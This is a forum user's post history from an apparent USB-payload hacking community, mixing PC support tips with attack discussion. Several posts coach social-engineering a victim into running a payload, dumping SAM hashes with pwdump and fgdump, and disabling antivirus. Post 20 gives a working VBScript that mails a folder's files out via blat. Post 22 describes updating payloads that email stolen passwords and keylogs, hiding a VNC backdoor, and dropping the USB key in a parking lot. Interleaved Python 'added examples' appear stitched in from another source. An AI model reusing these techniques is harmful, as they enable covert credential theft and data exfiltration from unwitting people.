pseudobreed

Active Members
  • Posts

    171
  • Joined

  • Last visited

Everything posted by pseudobreed

  1. If you keep getting different errors, it sounds like RAM. Essentially, if you have a spare computer sitting around that you know works fine, just swap parts from it until you find the hardware that is causing the problem. If you are running dual RAM chips, pull out one. If you still get the error, pull out that one and put the other one back in. If you still get the error, try RAM from another machine. If you still get a BSOD after that, then start changing out the vid card, sound card, etc. These types of issues are hard to diagnose unless you are in front of the machine.
  2. I'm not sure about ADSL2+ as I dropped DSL a while ago. The provider here is nowhere near up to par. I picked up a cable modem and went with Comcast, which has a stranglehold monopoly going on around here. I wish Verizon would come a little more south and I would jump on the fiber bandwagon.
  3. You don't have to log in to the server, just log in to a session on the server. I'm not at work so I don't have a network to try this out on, but try typing the following in the console:
      net use \\SERVERIP\Admin$ /user:Administrator
     Replace SERVERIP with your server's IP. It will prompt you for a password. You cannot use an account that does not have a password; sessions require passwords. Now try to connect via Computer Management and see if it will allow you to access the snap-ins. Once you are done, type the following in the console:
      net use \\SERVERIP\Admin$ /delete
     You are not deleting anything; it just deletes the session, or disconnects you.
  4. I'm not sure what will be available over in the UK, but here is what I checked:
     - Bellsouth sent my parents a modem with Ethernet and USB ports.
     - At work, Netopia and Bellsouth both provided DSL modems with Ethernet ports.
     - And, I still have a Westell 6100 modem from when I had Bellsouth DSL. (Great modem, crap ISP.)
     Westell Modems on eBay
  5. I have just checked 3 DSL modems, and they all have Ethernet ports as well as USB. Something I did notice is, if USB is attached it ignores the Ethernet. Can't have both at the same time. If you have a modem with just USB, send that thing back and tell them you don't have USB with all the new U3 hacks floating about =). I'm downloading the new DD-WRT now, so I guess I will find out in a second. *Actually, never mind. My Comcast modem is down yet again (and customer support wants me to transfer the modem to another address, considering I recently moved). You would think they would give ex-Comcast employees a break once in a while. I'm going to move in again in a couple of weeks, so I'll test it out then. Or maybe take my router over to a friend's house.
  6. I personally do not like software firewalls. I have never really seen one that does its job very well. If I had to pick one, I would go with Sygate, which Symantec acquired sometime last year. All DSL modems have built-in routers (NAT); don't mistake this for a firewall. Hardware firewalls are a little bit expensive, but save you in the long run. If you are on a budget, pick up a WRT54G. They are pretty cheap now and you can change the firmware to add more features (like a firewall). At home I have a WRT54G router with DD-WRT firmware. Come to think about it, I need to update it. Here is the Wiki entry on DD-WRT. It's full of features and you probably will not use a third of them. However, it's nice to know they are there. You could try and repair your OS. Here is a write-up on how to repair XP but keep all the programs and such. It will just wipe the base OS, service packs, and restore points. Then if all else fails, wipe it and start from scratch. Also, Windows Explorer will check the network once in a while to look for networked computers. You can turn this off by unchecking "Automatically search for network folders and printers" in the folder options. And, the Windows Time service goes and tries to sync the clock. That service can also be turned off. I'm not sure what program is used to sync the time, maybe explorer. Other than that, I don't see why explorer should try and query the network unless you have other services such as Hamachi or you are doing something on the network.
  7. You could have a PHP upload script so users could make their own banners, and have the forum pick a random logo. Then again, it would probably end up not being work-safe, scratch that idea.
  8. Not on a non-U3 USB drive on Windows XP SP1. The only option left is to manually run the payload. The person on an SP1 machine using USB drives should be used to this anyway. You could add some social engineering in there, "Oh, let me show you this game...", which is just a batch that calls the payload then runs sol.exe (Solitaire). They may look at you like you are crazy because you are raving about Solitaire; you will just have to continue playing it off. Just tell them you have uber micro in Solitaire and they can't compete with you. Play Solitaire just long enough to get the payload done, then tell them they win and go to Minesweeper. =) You could do the same thing with a picture instead of a game. P.S. - Anyone know the cheat in Minesweeper that changed the top-left pixel black if it was a bomb?
  9. Copy and paste the code into a .reg file:
      Windows Registry Editor Version 5.00

      [HKEY_CURRENT_USER\Software\Microsoft\Command Processor]
      "Autorun"="CD /D C:\\Windows"
     Change the Autorun value to the path that you want cmd to start in. Leave the "CD /D " part; that tells the console to CD, then go to a path. Use "\\" for each backslash, as the backslash is the escape character in a .reg file.
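The AutoRun value in post 9 is read by cmd.exe every time a console starts, which is exactly why the same key is a known persistence location for attackers. The following is an added example, not the poster's code: a small parser for Registry Editor 5.00 export text that undoes the .reg string escaping (so "C:\\Windows" in the file comes back as C:\Windows) and lists every Command Processor AutoRun value it finds in either hive. The sample export is constructed for the demonstration; it carries the HKCU entry from the post and a hypothetical HKLM entry pointing at an update.bat under C:\Users\Public.

```python
"""Parse a Registry Editor 5.00 export and flag cmd.exe AutoRun persistence entries."""
import re

# Constructed sample export (not taken from a real machine). The HKCU entry is
# the one from the post above; the HKLM entry is hypothetical and shows the case
# an auditor cares about: a script that runs before every cmd.exe on the box.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Command Processor]
"Autorun"="CD /D C:\\Windows"
"CompletionChar"=dword:00000009

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor]
"AutoRun"="\"C:\\Users\\Public\\update.bat\""
'''

_KEY_RE = re.compile(r'^\[([^\]]+)\]$')
_VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')
AUTORUN_KEY_SUFFIX = r'\software\microsoft\command processor'


def unescape(s):
    # .reg string escaping: a doubled backslash is one backslash, \" is a quote
    return re.sub(r'\\(.)', r'\1', s)


def parse_reg(text):
    """Return {key_path: {value_name: data}}.

    REG_SZ data is unescaped; other types (dword:, hex:) are kept as raw text.
    """
    keys = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(';') or line.startswith('Windows Registry Editor'):
            continue
        m = _KEY_RE.match(line)
        if m:
            # "[-HKEY...]" marks a key deletion; record the path either way
            current = m.group(1).lstrip('-')
            keys.setdefault(current, {})
            continue
        m = _VALUE_RE.match(line)
        if m and current is not None:
            name, data = unescape(m.group(1)), m.group(2)
            if data.startswith('"') and data.endswith('"'):
                data = unescape(data[1:-1])
            keys[current][name] = data
    return keys


def find_autorun(keys):
    """List (key_path, command) for every non-empty Command Processor AutoRun value.

    Both hives matter: HKLM applies to every user, HKCU only to the owner of that hive.
    """
    hits = []
    for key, values in keys.items():
        if not key.lower().endswith(AUTORUN_KEY_SUFFIX):
            continue
        for name, data in values.items():
            if name.lower() == 'autorun' and data:
                hits.append((key, data))
    return hits


if __name__ == '__main__':
    for key, cmd in find_autorun(parse_reg(SAMPLE_REG)):
        print(f'{key}: {cmd}')
```

On a live system the same check can be run against a `reg export` of each Command Processor key; an empty or absent AutoRun is the normal state, and anything else deserves a look at what the command launches.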
  10. I'll have to check out the code in pwdump and see if I can offer any help. Oh, and if you screw up your SAM again, use this. It has saved me before. Just burn the ISO, and if you lose your accounts, boot from the CD and it can rebuild the SAM hashes. I have never got the thing to work changing the password; however, I have got it to work by just blanking out the password.
  11. @Deveant pwdump does not dump out a product key. It dumps out the hashes in the SAM.
  12. Very nice. I thought my Memorex was toast when I deleted the U3 software off it and there was no LPInstaller for Memorex. I tested this with my payload and everything works just like the Cruzer.
  13. Going to take a stab at this:
      PDVDServ is PowerDVD, I think.
      wscntfy is the Windows Security tray icon telling you something is off.
      alg.exe is the Application Layer Gateway, used for ICS.
      UMX, I'm not sure, but wasn't that one of the exe encrypters mentioned before?
      svchost is common and it handles most of Windows networking.
      I actually had VNC running with the name svchost one time, thinking it would make it easier to hide the application from anyone who checked the Task Manager. In actuality, it made it harder to end the VNC process tree. It's much easier to just hide the application from showing up in the list. I see you are running XP 64. How do you like it? I had it going for a while until I noticed the overall performance drop. It's like Microsoft just layered 64-bit functionality over a 32-bit OS. And having two Program Files directories drove me nuts.
  14. The one in the Switchblade uses pwdump and it causes the same thing with lsass.exe. I used fgdump and it checks to see if it can dump before actually attempting to do so. This way, if it cannot, it will not force the machine to shut down and you just get a log file instead of the hashes. I want to try this on an Active Directory machine to see if it works on those accounts.
  15. Ok, I played around with it, and Error 5 means your local account does not have rights on the remote machine. You can fix this by either adding an account to the remote machine with the same credentials as the remote user, or logging in under the server's administrator account. I just opened up Windows Explorer, typed the server's address and it gave me a login prompt. I logged in under the server's local admin account and the Error 5 did not come up, and I had full access to all the snap-ins. I'm on Windows XP Pro. And, I tried this on two different servers. Both are Windows 2000 and only one is running Active Directory. The other does not use AD to auth users. I also tried this on another XP machine and got the same error until I logged into their computer using their local admin account.
  16. I have used RockXP many a time before for people who needed a computer rebuilt but lost their current XP product key; works great. The new version actually has a dumper built in; however, it's based on pwdump code and can throw lsass.exe into berserk mode, which will shut down the computer. The new version also will extract CD keys from other products such as Office XP. I just ran into the same problem you are having with compiling code. I used to have Visual Studio 2005 when I was a developer (came with MSDN) and I cannot seem to find it. So, I downloaded the free Express edition and started coding in it. When it came time to build my project I was getting a crapload of errors and it could not find some of the headers I wanted to include (mainly windows.h). I read up on why this was happening, and most people were having the same problem. I tried some fixes others posted but I never could get the thing to compile. I guess I'm going to have to ride back up to my old work and borrow VS2005 again. * I just found this link. It has links to the new SDKs and how to compile from the command line. I'm going to try this out later.
  17. If the original was called the Switchblade, why is Darren calling the next version the USB Hacksaw? A scary thought.
  18. I know it's rude to reply only to answer with a question... However, are you using the Remote Desktop that is built into Windows? I used that thing a long time ago with Hamachi. It was a nightmare. I use VNC to manage the servers and computers. And, for the not-so-savvy clients I set up pcAnywhere so they can work out of the office. You will have to open up ports on the firewalls to use both the apps; however, only on the server side. The remote does not need the ports open on a PUSH firewall setup. I don't use a software firewall; however, I'm sure you probably have to tell it to allow VNC/pcAnywhere to use the port. Here are some articles that may help:
      Geek to Live: Create your own virtual private network with Hamachi
      Geek to Live: How to control your home computer from anywhere
      Secure VNC remote access
  19. The first thing that came to mind was to use WMI. The following code will query the NetworkLoginProfile and check the privileges of the currently logged-in user. If the privilege is equal to 2, then the user account has admin rights and you can add the rest of the code there. Copy and paste the code into a .vbs file.
      szComputer = "."
      Set objShell = WScript.CreateObject("WScript.Shell")
      Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & szComputer & "\root\cimv2")
      Set colItems = objWMIService.ExecQuery("Select * from Win32_NetworkLoginProfile")
      szUser = objShell.ExpandEnvironmentStrings("%USERNAME%")
      For Each objItem in colItems
          ' Name comes back as DOMAIN\user (or COMPUTER\user), so compare only the part after the backslash
          szProfile = Mid(objItem.Name, InStrRev(objItem.Name, "\") + 1)
          If StrComp(szProfile, szUser, vbTextCompare) = 0 Then
              If objItem.Privileges = 2 Then
                  ' 0 - Guest
                  ' 1 - User
                  ' 2 - Administrator
                  ' <INSERT REST OF CODE HERE>
              End If
          End If
      Next
  20. That was my fault. Trying to pull off batch commands in VBScript. This works, and I actually tested it using blat instead of the echo command.
      Set FSO = CreateObject("Scripting.FileSystemObject")
      ReDim arrFiles(1)
      i = 0    ' start the index explicitly instead of relying on an Empty variant
      Set Folder = FSO.GetFolder(".")
      Set Files = Folder.Files
      ' collect every file in the current folder whose name matches the wildcard given as argument 0
      For Each File in Files
          If CheckFile(File.Name, WScript.Arguments(0)) Then
              If i > UBound(arrFiles) Then ReDim Preserve arrFiles(i*2)
              arrFiles(i) = File.Path
              i = i + 1
          End If
      Next
      If i = 0 Then WScript.Quit    ' nothing matched; ReDim Preserve arrFiles(-1) would fail
      ReDim Preserve arrFiles(i-1)

      Set WSHShell = WScript.CreateObject("WScript.Shell")
      For Each FileName In arrFiles
          ' the path is quoted so file names containing spaces survive the command line
          Send = "blat.exe """ & FileName & """ -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099"
          'WScript.Echo Send
          WSHShell.Run Send
      Next

      ' DOS-style wildcard match: "*" matches any run, "?" one character (but may match nothing
      ' in front of a "."), and a filter ending in "." or ".*" also matches a name with no extension.
      ' Letters are compared case-insensitively.
      Private Function CheckFile(ByVal Name, ByVal Filter)
          CheckFile = False
          FilterPos = 1
          NamePos = 1
          Do
              If FilterPos > Len(Filter) Then
                  CheckFile = NamePos > Len(Name)
                  Exit Function
              End If
              If Mid(Filter, FilterPos) = ".*" Then
                  If NamePos > Len(Name) Then
                      CheckFile = True
                      Exit Function
                  End If
              End If
              If Mid(Filter, FilterPos) = "." Then
                  CheckFile = NamePos > Len(Name)
                  Exit Function
              End If
              FilterCount = Mid(Filter, FilterPos, 1)
              FilterPos = FilterPos + 1
              Select Case FilterCount
                  Case "*"
                      CheckFile = CheckFile2(Name, NamePos, Filter, FilterPos)
                      Exit Function
                  Case "?"
                      If NamePos <= Len(Name) And Mid(Name, NamePos, 1) <> "." Then NamePos = NamePos + 1
                  Case Else
                      If NamePos > Len(Name) Then Exit Function
                      NameCount = Mid(Name, NamePos, 1)
                      NamePos = NamePos + 1
                      If StrComp(FilterCount, NameCount, vbTextCompare) <> 0 Then Exit Function
              End Select
          Loop
      End Function

      ' Handles the rest of the filter after a "*": skip any further wildcards, then try each
      ' position in the name where the next literal character could start.
      Private Function CheckFile2(ByVal Name, ByVal NamePos0, ByVal Filter, ByVal FilterPos0)
          FilterPos = FilterPos0
          Do
              If FilterPos > Len(Filter) Then
                  CheckFile2 = True
                  Exit Function
              End If
              FilterCount2 = Mid(Filter, FilterPos, 1)
              FilterPos = FilterPos + 1
              If FilterCount2 <> "*" And FilterCount2 <> "?" Then Exit Do
          Loop
          If FilterCount2 = "." Then
              If Mid(Filter, FilterPos) = "*" Then
                  CheckFile2 = True
                  Exit Function
              End If
              If FilterPos > Len(Filter) Then
                  CheckFile2 = InStr(NamePos0, Name, ".") = 0
                  Exit Function
              End If
          End If
          For NamePos = NamePos0 To Len(Name)
              NameCount = Mid(Name, NamePos, 1)
              If StrComp(FilterCount2, NameCount, vbTextCompare) = 0 Then
                  If CheckFile(Mid(Name, NamePos + 1), Mid(Filter, FilterPos)) Then
                      CheckFile2 = True
                      Exit Function
                  End If
              End If
          Next
          CheckFile2 = False
      End Function
      Just change the credentials for blat and everything should be ok.
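The CheckFile/CheckFile2 routines in post 20 implement the old DOS wildcard rules rather than the shell globbing most people expect, and the difference decides which files get picked up and mailed out: "*.*" and "*." also match names with no extension, "?" can match nothing in front of the dot, and comparison is case-insensitive. The block below is an added example, not code from the post: a Python port of the same algorithm, a helper that filters a directory listing with it the way the script selects files for blat, and a check against Python's fnmatch to show where the two rule sets disagree. The directory listing is constructed for the demonstration.

```python
"""DOS-style wildcard matching with the same rules as the CheckFile/CheckFile2 routines above."""
import fnmatch


def dos_match(name, pattern):
    """Return True if `name` matches `pattern` under 8.3-era rules.

    '*' matches any run, '?' one character but may match nothing in front of a
    '.', a pattern ending in '.' or '.*' also matches a name with no extension,
    and letters compare case-insensitively.
    """
    np = fp = 0
    while True:
        if fp >= len(pattern):
            return np >= len(name)               # pattern exhausted: name must be too
        rest = pattern[fp:]
        if rest == ".*" and np >= len(name):
            return True                          # "name.*" matches "name"
        if rest == ".":
            return np >= len(name)               # "name." matches only "name"
        fc = pattern[fp]
        fp += 1
        if fc == "*":
            return _match_after_star(name, np, pattern, fp)
        if fc == "?":
            if np < len(name) and name[np] != ".":
                np += 1                          # '?' never consumes the dot
        else:
            if np >= len(name) or fc.lower() != name[np].lower():
                return False
            np += 1


def _match_after_star(name, np0, pattern, fp):
    """Handle the part of `pattern` after a '*' (the CheckFile2 routine)."""
    fc2 = None
    while fp < len(pattern):
        fc2 = pattern[fp]
        fp += 1
        if fc2 not in "*?":
            break                                # first literal after the wildcard run
    else:
        return True                              # nothing but wildcards left
    if fc2 == ".":
        if pattern[fp:] == "*":
            return True                          # "*.*" matches everything, dot or not
        if fp >= len(pattern):
            return "." not in name[np0:]         # "*." matches names without an extension
    for np in range(np0, len(name)):
        if name[np].lower() == fc2.lower() and dos_match(name[np + 1:], pattern[fp:]):
            return True
    return False


def select_files(names, pattern):
    """Filter a list of file names the way the script above picks files to send."""
    return [n for n in names if dos_match(n, pattern)]


def differs_from_fnmatch(name, pattern):
    """True where the DOS rules and Python's fnmatch disagree (e.g. "README" against "*.*")."""
    return dos_match(name, pattern) != fnmatch.fnmatch(name, pattern)


# Constructed directory listing for the demonstration.
SAMPLE_NAMES = ["README", "report.txt", "REPORT.TXT", "notes.doc", "archive.tar.gz", "a.txt"]


if __name__ == "__main__":
    for pat in ("*.*", "*.txt", "???.txt", "report.*"):
        print(f"{pat:10} -> {select_files(SAMPLE_NAMES, pat)}")
```

The practical consequence for the script in the post is that running it with "*.*" sends every file in the folder, extension or not, which is not what the same pattern means to a Unix shell.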
  21. The AVKiller almost needs a thread by itself. I tried it on one of my laptops running AntiVir and it did not kill it. I'm not sure how discreet you are trying to make it; however, these are the things that popped up on me. I use Task Scheduler/at all the time, so when I noticed the new task scheduled it caught my eye. This only happens when you use it without the switch, and I'm sure that is to gain SYSTEM rights. A couple of issues there: the Task Scheduler service has to be running and you have to have rights to the AT command. Also, when I run 'avkill -a' from the command line about 4-5 console windows pop up on my start menu. This laptop is running XP SP2 and AntiVir. Here is some info on AntiVir that may help:
      Installed Directory: C:\Program Files\AntiVir PersonalEdition Classic
      Main Process: C:\Program Files\AntiVir PersonalEdition Classic\avcenter.exe
      Modules:
        C:\Program Files\AntiVir PersonalEdition Classic\ccmainrc.dll
        C:\Program Files\AntiVir PersonalEdition Classic\ccgrdrc.dll
      Application Specific:
        build.dat - Build Number
        avewin32.dll - Search Engine
        antivir.vdf - Virus Definitions
        avcenter.exe - Control Center
        avconfig.exe - Config Center
        avscan.exe - Luke Filewalker
        avpack32.dll - Archive Library
        avguard.exe - AntiVir Guard
        avgnflt.sys - Filter
        sched.exe - Scheduler
        update.exe - Updater
      Services:
        AntiVirService - AntiVir PersonalEdition Classic Guard
        AntiVirScheduler - AntiVir PersonalEdition Classic Scheduler
      If there is anything else I can provide that will help, let me know.
  22. Instead of just ending the batch, why not call a goto that will exec applications that have dumps that could have changed (i.e. Internet history/passwords, email client, messengers, keylogs)? I do see what you are saying, no reason to pull off a full payload if you already have most of the info. I added an update to the payload that downloads a new payload and dumps info that may have changed and emails it out using blat. I personally didn't want to chance plugging the drive in again, especially if it was physically difficult to get to the computer the first time. If only I could get a good NAT-NAT connection going, then the backdoor VNC would come in handy much more when needing to remotely update the payload. At the moment, I'm limited to computers that are on the same network. Like the user who walks away from his computer to get a refill at the local "hot-spot." I'm dropping Hamachi as an option. I started to write an app that grabbed the hwnd of applications so I could delete the system tray icons; however, Hamachi adds much more than just an icon, and I'm not sure if you can hide network adapters or not. I'm going to check out OpenVPN now... Once I get that going, I'm thinking about "losing" the key in a parking lot and having blat just email once the payload is pulled off. Would be kind of interesting to see where it travels. Unless someone puts it in a machine that has no internet connection, then formats the drive to keep as their own.
  23. I remember there being a proof of concept where you could RPC the Wireless Zero Configuration Service and it would drop WEP and WPA in clear text. And, you could do it without being under an admin account. However, it only worked after View Available Wireless Networks was opened. In June, Microsoft issued a patch that actually changes the time it holds this info in the cache. I didn't hear much about it after that, or even know if the exploit still works.